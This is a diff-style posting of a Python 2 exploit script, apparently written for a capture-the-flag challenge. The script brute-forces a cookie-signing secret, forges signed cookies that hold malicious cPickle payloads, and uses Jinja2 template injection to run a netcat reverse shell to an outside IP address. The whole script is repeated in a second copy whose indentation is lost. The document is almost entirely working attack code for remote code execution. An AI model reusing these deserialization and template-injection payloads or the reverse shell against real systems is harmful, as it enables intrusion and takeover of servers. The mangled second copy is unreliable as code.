peternguyen93 · April 14, 2018 10:10
diff --git a/python_revenge_exploit.py b/python_revenge_exploit.py
 import requests
 import cPickle
 import sys
 import os
 import hashlib
 from base64 import b64encode, b64decode
 import string
 import json
 import flask


 # class Target(object):
 # 	def __reduce__(self):
 # 		return (__import__, ('json',))

 class Target(object):
 	def __reduce__(self):
 		return (repr, ('This is marked',))

 class Import(object):
 	def __reduce__(self):
 		return (__import__, ('flask',))

 shell = """
 {% for c in [].__class__.__base__.__subclasses__() %}
 {% if c.__name__ == 'catch_warnings' %}
 {{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 | /bin/sh | nc 139.59.244.42 31338') }}
 {% endif %}
 {% endfor %}
 """

 class Execute(object):
 	def __reduce__(self):
 		return (flask.render_template_string, (shell,))

 local = 'http://localhost:8888/'
 remote = 'http://47.75.151.118:9999/'


 def bruteforce():
 	server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
 	_hash, data = server_cookie.split('!')

 	charset = string.ascii_letters + string.digits
 	# reverse = charset[::-1]

 	for c in charset:
 		for k in charset:
 			for z in charset:
 				for x in charset:
 					secret = c + k + z + x
 					print '[!] Try:',secret
 					if hashlib.sha256(data + secret).hexdigest() == _hash:
 						return secret

 def cretae_cookie(data,secret):
 	return '%s!%s' % (hashlib.sha256(data + secret).hexdigest(),data)

 # secret = bruteforce()
 # print 'Secret:',secret
 secret = 'hitb'

 local = remote

 data =  b64encode(cPickle.dumps(Import()))
 cookie = {'location' : cretae_cookie(data,secret)}
 print cookie
 requests.get(local,cookies=cookie)

 cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
 print cookie
 req = requests.get(local,cookies=cookie)
 print req.text
	import requests
	import cPickle
	import sys
	import os
	import hashlib
	from base64 import b64encode, b64decode
	import string
	import json
	import flask


	# class Target(object):
	# def __reduce__(self):
	# return (__import__, ('json',))

	class Target(object):
	def __reduce__(self):
	return (repr, ('This is marked',))

	class Import(object):
	def __reduce__(self):
	return (__import__, ('flask',))

	shell = """
	{% for c in [].__class__.__base__.__subclasses__() %}
	{% if c.__name__ == 'catch_warnings' %}
	{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 \| /bin/sh \| nc 139.59.244.42 31338') }}
	{% endif %}
	{% endfor %}
	"""

	class Execute(object):
	def __reduce__(self):
	return (flask.render_template_string, (shell,))

	local = 'http://localhost:8888/'
	remote = 'http://47.75.151.118:9999/'


	def bruteforce():
	server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
	_hash, data = server_cookie.split('!')

	charset = string.ascii_letters + string.digits
	# reverse = charset[::-1]

	for c in charset:
	for k in charset:
	for z in charset:
	for x in charset:
	secret = c + k + z + x
	print '[!] Try:',secret
	if hashlib.sha256(data + secret).hexdigest() == _hash:
	return secret

	def cretae_cookie(data,secret):
	return '%s!%s' % (hashlib.sha256(data + secret).hexdigest(),data)

	# secret = bruteforce()
	# print 'Secret:',secret
	secret = 'hitb'

	local = remote

	data = b64encode(cPickle.dumps(Import()))
	cookie = {'location' : cretae_cookie(data,secret)}
	print cookie
	requests.get(local,cookies=cookie)

	cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
	print cookie
	req = requests.get(local,cookies=cookie)
	print req.text